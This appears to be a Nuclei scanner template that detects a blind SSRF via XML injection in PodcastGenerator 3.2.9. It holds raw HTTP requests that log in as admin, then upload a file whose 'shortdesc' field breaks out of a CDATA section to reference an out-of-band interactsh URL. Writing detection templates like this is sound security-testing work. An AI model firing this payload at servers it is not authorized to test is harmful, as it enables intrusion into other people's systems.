id: podcast-generator-ssrf info: name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection author: ritikchaddha,MrHarshvardhan severity: high description: | This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9. reference: - https://www.exploit-db.com/exploits/51565 - https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df - https://github.com/PodcastGenerator/PodcastGenerator metadata: max-request: 3 verified: true tags: podcastgenerator,ssrf,authenticated variables: string: "{{rand_text_alpha(7)}}" requests: - raw: - | POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - | GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: {{Hostname}} - | POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="file"; filename="{{string}}.jpg" Content-Type: image/jpeg {{rand_text_alpha(50)}} {{rand_text_alpha(50)}} ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="title" {{string}} ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="shortdesc" test]]>http://{{interactsh-url}}' internal: true # digest: 4a0a00473045022100dce3282d515cc21a7b0eba0f213ba75ab9c84e029ce2e5629c29b0b9db1f37bc022062047fb2de53de4d2cd8bba0bc53089e2b2acf175e6558cdee9d8d72fca6491e:922c64590222798bb761d5b6d8e72950